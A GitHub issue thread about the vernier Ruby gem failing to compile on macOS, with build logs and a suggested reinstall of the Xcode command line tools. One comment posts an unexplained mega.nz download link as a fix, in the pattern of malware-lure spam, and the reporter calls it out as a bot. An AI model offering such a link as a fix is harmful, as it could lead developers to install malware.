### ISSUE TITLE
Compilation failure in ruby 3.3.5

### ISSUE THREAD

**Issue by CKolkey** [jhawthorn/vernier#96]
Hi! My team updated to ruby 3.3.5 recently and I encountered this issue when adding vernier to the Gemfile:

```
Installing vernier 1.2.1 with native extensions
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.

    current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
/Users/cameron/.local/share/mise/installs/ruby/3.3.5/bin/ruby extconf.rb
checking for ruby/thread.h... yes
checking for rb_internal_thread_event_data_t.thread in ruby/thread.h... yes
checking for rb_profile_thread_frames() in ruby/debug.h... yes
checking for pthread_setname_np()... yes
creating Makefile

current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20240919-62961-eun7f3 sitelibdir\=./.gem.20240919-62961-eun7f3 clean

current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20240919-62961-eun7f3 sitelibdir\=./.gem.20240919-62961-eun7f3
compiling vernier.cc
vernier.cc:3:10: fatal error: 'iostream' file not found
    3 | #include <iostream>
      |          ^~~~~~~~~~
1 error generated.
make: *** [vernier.o] Error 1

make failed, exit code 2
```

I uninstalled the ruby and reinstalled it, which produces a slightly different failure:

```
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.

    current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
/Users/cameron/.local/share/mise/installs/ruby/3.3.5/bin/ruby extconf.rb
checking for ruby/thread.h... yes
checking for rb_internal_thread_event_data_t.thread in ruby/thread.h... yes
checking for rb_profile_thread_frames() in ruby/debug.h... yes
checking for pthread_setname_np()... yes
creating Makefile

current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20240919-38586-5ia38x sitelibdir\=./.gem.20240919-38586-5ia38x clean

current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20240919-38586-5ia38x sitelibdir\=./.gem.20240919-38586-5ia38x
compiling vernier.cc
make: *** [vernier.o] Error 1

make failed, exit code 2

Gem files will remain installed in /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1 for inspection.
Results logged to /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/extensions/arm64-darwin-24/3.3.0/vernier-1.2.1/gem_make.out

  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/builder.rb:125:in `run'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/builder.rb:51:in `block in make'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/builder.rb:43:in `each'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/builder.rb:43:in `make'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/ext_conf_builder.rb:42:in `build'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/builder.rb:193:in `build_extension'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/builder.rb:227:in `block in build_extensions'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/builder.rb:224:in `each'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/ext/builder.rb:224:in `build_extensions'
  /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/3.3.0/rubygems/installer.rb:853:in `build_extensions'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/rubygems_gem_installer.rb:109:in `build_extensions'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/rubygems_gem_installer.rb:28:in `install'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/source/rubygems.rb:205:in `install'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/installer/gem_installer.rb:54:in `install'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/installer/gem_installer.rb:16:in `install_from_spec'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/installer/parallel_installer.rb:132:in `do_install'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/installer/parallel_installer.rb:123:in `block in worker_pool'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/worker.rb:62:in `apply_func'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/worker.rb:57:in `block in process_queue'
  <internal:kernel>:187:in `loop'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/worker.rb:54:in `process_queue'
  /Users/cameron/.gem/ruby/3.3.0/gems/bundler-2.5.18/lib/bundler/worker.rb:90:in `block (2 levels) in create_threads'

An error occurred while installing vernier (1.2.1), and Bundler cannot continue.
```

Platform is Macos 15.0, on an ARM processor (m2).
Ruby is installed via mise.
Ruby version is 3.3.5
Vernier version is 1.2.1 (latest at the time of this post).

Let me know if I can provide any other details to help figure out whats going on :)

Thanks!

**Comment by nhatlaso1** [comment]
maybe this will help

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
If you don't have the c compliator, install it.(gcc or clang)

**Comment by CKolkey** [comment]
^^ Nice try, robot 🙄

**Comment by casperisfine** [comment]
Could you share the content of `gem_make.out`? That's where the actual error might be located.

**Comment by CKolkey** [comment]
Sadly not - I didn't include that originally because it's the same as whats printed above:

```
> cat /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/extensions/arm64-darwin-24/3.3.0/vernier-1.2.1/gem_make.out      
                                                                                                                                                                     
current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
/Users/cameron/.local/share/mise/installs/ruby/3.3.5/bin/ruby extconf.rb
checking for ruby/thread.h... yes
checking for rb_internal_thread_event_data_t.thread in ruby/thread.h... yes
checking for rb_profile_thread_frames() in ruby/debug.h... yes
checking for pthread_setname_np()... yes
creating Makefile

current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20240919-66968-unlaz9 sitelibdir\=./.gem.20240919-66968-unlaz9 clean

current directory: /Users/cameron/.local/share/mise/installs/ruby/3.3.5/lib/ruby/gems/3.3.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20240919-66968-unlaz9 sitelibdir\=./.gem.20240919-66968-unlaz9
compiling vernier.cc
make: *** [vernier.o] Error 1

make failed, exit code 2
```

**Comment by CKolkey** [comment]
Cloning vernier locally, on main branch.

```
> rake compile                                                                                                                                                                                                                                                                                                                 
mkdir -p tmp/arm64-darwin24/vernier/3.3.5
cd tmp/arm64-darwin24/vernier/3.3.5
/Users/cameron/.local/share/mise/installs/ruby/3.3.5/bin/ruby -I. ../../../../ext/vernier/extconf.rb
checking for ruby/thread.h... yes
checking for rb_internal_thread_event_data_t.thread in ruby/thread.h... yes
checking for rb_profile_thread_frames() in ruby/debug.h... yes
checking for pthread_setname_np()... yes
creating Makefile
cd -
cd tmp/arm64-darwin24/vernier/3.3.5
/opt/homebrew/bin/gmake
compiling ../../../../ext/vernier/vernier.cc
gmake: *** [Makefile:216: vernier.o] Error 1
rake aborted!
Command failed with status (2): [/opt/homebrew/bin/gmake]

Tasks: TOP => compile => compile:arm64-darwin24 => compile:vernier:arm64-darwin24 => copy:vernier:arm64-darwin24:3.3.5 => tmp/arm64-darwin24/vernier/3.3.5/vernier.bundle
(See full trace by running task with --trace)
```

and

```
> rake compile:vernier                                                                                                                                                                                                                                                                                                         
cd tmp/arm64-darwin24/vernier/3.3.5
/opt/homebrew/bin/gmake
compiling ../../../../ext/vernier/vernier.cc
gmake: *** [Makefile:216: vernier.o] Error 1
rake aborted!
Command failed with status (2): [/opt/homebrew/bin/gmake]

Tasks: TOP => compile:vernier => compile:vernier:arm64-darwin24 => copy:vernier:arm64-darwin24:3.3.5 => tmp/arm64-darwin24/vernier/3.3.5/vernier.bundle
(See full trace by running task with --trace)
```

**Comment by CKolkey** [comment]
Interestingly, when trying that with ruby 3.3.4, it produces the iostream error:

```
> rake compile:vernier                                                                                                                                                                                                                                                                                                                                              v3.3.4
mkdir -p tmp/arm64-darwin23/vernier/3.3.4
cd tmp/arm64-darwin23/vernier/3.3.4
/Users/cameron/.local/share/mise/installs/ruby/3.3.4/bin/ruby -I. ../../../../ext/vernier/extconf.rb
checking for ruby/thread.h... yes
checking for rb_internal_thread_event_data_t.thread in ruby/thread.h... yes
checking for rb_profile_thread_frames() in ruby/debug.h... yes
checking for pthread_setname_np()... yes
creating Makefile
cd -
cd tmp/arm64-darwin23/vernier/3.3.4
/opt/homebrew/bin/gmake
compiling ../../../../ext/vernier/vernier.cc
../../../../ext/vernier/vernier.cc:3:10: fatal error: 'iostream' file not found
    3 | #include <iostream>
      |          ^~~~~~~~~~
1 error generated.
gmake: *** [Makefile:216: vernier.o] Error 1
rake aborted!
Command failed with status (2): [/opt/homebrew/bin/gmake]

Tasks: TOP => compile:vernier => compile:vernier:arm64-darwin23 => copy:vernier:arm64-darwin23:3.3.4 => tmp/arm64-darwin23/vernier/3.3.4/vernier.bundle
(See full trace by running task with --trace)
```

However, I was using vernier just fine on this computer a few days ago with 3.3.4. That _was_ with the previous macos, but vernier failed to compile for 3.3.5 with that OS as well.

**Comment by jhawthorn** [comment]
I don't think this is related to Ruby 3.3.5, seems more likely this is related to either Sequoia or the xcode command line tools.

**Comment by jhawthorn** [comment]
I was able to reproduce this on my mac after both the software updates. However it went away after I reinstalled the command line tools:

```
❯ sudo rm -Rf /Library/Developer/CommandLineTools
Password:
❯ xcode-select --install
xcode-select: note: install requested for command line developer tools
```

I don't know if there's a better way to do that but this seems like a macos/xcode bug which is fixed by reinstall.

**Comment by williamtstanley** [comment]
I am running into the same install/build issue however reinstalling xcode tools did not resolve it.

**Comment by mediafinger** [comment]
I run into the same issue wit **Ruby 3.4**:

* M2 Mac
* macOS Sonoma 14.7
* Ruby 3.4.0-preview2
* my brew packages are up-top-date

**bundle install failure:**

```log
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.

    current directory: /Users/andy/.gem/ruby/3.4.0/gems/vernier-1.2.1/ext/vernier
/Users/andy/.rubies/ruby-3.4.0-preview2/bin/ruby extconf.rb
checking for ruby/thread.h... yes
checking for rb_internal_thread_event_data_t.thread in ruby/thread.h... yes
checking for rb_profile_thread_frames() in ruby/debug.h... yes
checking for pthread_setname_np()... yes
creating Makefile

current directory: /Users/andy/.gem/ruby/3.4.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20241014-43337-yplxhw sitelibdir\=./.gem.20241014-43337-yplxhw clean

current directory: /Users/andy/.gem/ruby/3.4.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20241014-43337-yplxhw sitelibdir\=./.gem.20241014-43337-yplxhw
compiling vernier.cc
make: *** [vernier.o] Error 1

make failed, exit code 2

Gem files will remain installed in /Users/andy/.gem/ruby/3.4.0/gems/vernier-1.2.1 for inspection.
Results logged to /Users/andy/.gem/ruby/3.4.0/extensions/arm64-darwin-23/3.4.0+0-static/vernier-1.2.1/gem_make.out

  /Users/andy/.rubies/ruby-3.4.0-preview2/lib/ruby/3.4.0+0/rubygems/ext/builder.rb:126:in 'Gem::Ext::Builder.run'
  /Users/andy/.rubies/ruby-3.4.0-preview2/lib/ruby/3.4.0+0/rubygems/ext/builder.rb:52:in 'block in Gem::Ext::Builder.make'
  <internal:array>:42:in 'Array#each'
  /Users/andy/.rubies/ruby-3.4.0-preview2/lib/ruby/3.4.0+0/rubygems/ext/builder.rb:44:in 'Gem::Ext::Builder.make'
/Users/andy/.rubies/ruby-3.4.0-preview2/lib/ruby/3.4.0+0/rubygems/ext/ext_conf_builder.rb:44:in
'Gem::Ext::ExtConfBuilder.build'
  /Users/andy/.rubies/ruby-3.4.0-preview2/lib/ruby/3.4.0+0/rubygems/ext/builder.rb:195:in 'Gem::Ext::Builder#build_extension'
/Users/andy/.rubies/ruby-3.4.0-preview2/lib/ruby/3.4.0+0/rubygems/ext/builder.rb:229:in 'block in
Gem::Ext::Builder#build_extensions'
  <internal:array>:42:in 'Array#each'
  /Users/andy/.rubies/ruby-3.4.0-preview2/lib/ruby/3.4.0+0/rubygems/ext/builder.rb:226:in 'Gem::Ext::Builder#build_extensions'
  /Users/andy/.rubies/ruby-3.4.0-preview2/lib/ruby/3.4.0+0/rubygems/installer.rb:844:in 'Gem::Installer#build_extensions'
/Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/rubygems_gem_installer.rb:109:in
'Bundler::RubyGemsGemInstaller#build_extensions'
/Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/rubygems_gem_installer.rb:28:in
'Bundler::RubyGemsGemInstaller#install'
  /Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/source/rubygems.rb:205:in 'Bundler::Source::Rubygems#install'
  /Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/installer/gem_installer.rb:54:in 'Bundler::GemInstaller#install'
/Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/installer/gem_installer.rb:16:in
'Bundler::GemInstaller#install_from_spec'
/Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/installer/parallel_installer.rb:132:in
'Bundler::ParallelInstaller#do_install'
/Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/installer/parallel_installer.rb:123:in 'block in
Bundler::ParallelInstaller#worker_pool'
  /Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/worker.rb:62:in 'Bundler::Worker#apply_func'
  /Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/worker.rb:57:in 'block in Bundler::Worker#process_queue'
  <internal:kernel>:168:in 'Kernel#loop'
  /Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/worker.rb:54:in 'Bundler::Worker#process_queue'
/Users/andy/.gem/ruby/3.4.0/gems/bundler-2.5.18/lib/bundler/worker.rb:90:in 'block (2 levels) in
Bundler::Worker#create_threads'

An error occurred while installing vernier (1.2.1), and Bundler cannot continue.
```

**gem install failure:**

```log 
Building native extensions. This could take a while...
ERROR:  Error installing vernier:
	ERROR: Failed to build gem native extension.

    current directory: /Users/andy/.gem/ruby/3.4.0/gems/vernier-1.2.1/ext/vernier
/Users/andy/.rubies/ruby-3.4.0-preview2/bin/ruby extconf.rb
checking for ruby/thread.h... yes
checking for rb_internal_thread_event_data_t.thread in ruby/thread.h... yes
checking for rb_profile_thread_frames() in ruby/debug.h... yes
checking for pthread_setname_np()... yes
creating Makefile

current directory: /Users/andy/.gem/ruby/3.4.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20241014-59378-l4ab2b sitelibdir\=./.gem.20241014-59378-l4ab2b clean

current directory: /Users/andy/.gem/ruby/3.4.0/gems/vernier-1.2.1/ext/vernier
make DESTDIR\= sitearchdir\=./.gem.20241014-59378-l4ab2b sitelibdir\=./.gem.20241014-59378-l4ab2b
compiling vernier.cc
make: *** [vernier.o] Error 1

make failed, exit code 2

Gem files will remain installed in /Users/andy/.gem/ruby/3.4.0/gems/vernier-1.2.1 for inspection.
Results logged to /Users/andy/.gem/ruby/3.4.0/extensions/arm64-darwin-23/3.4.0+0-static/vernier-1.2.1/gem_make.out
```

The content of the _gem_make.out_ file are the same as the output above.

---

I did not try to re-install the command line tools. I only told my colleague to not add vernier to our bundle for now.

**Comment by chaadow** [comment]
I have my colleague who has the same issue as @mediafinger  ( btw did they manage to install it? )


M1 Mac
macOS Sonoma 14.7
Ruby 3.4.1
vernier `1.5.0`
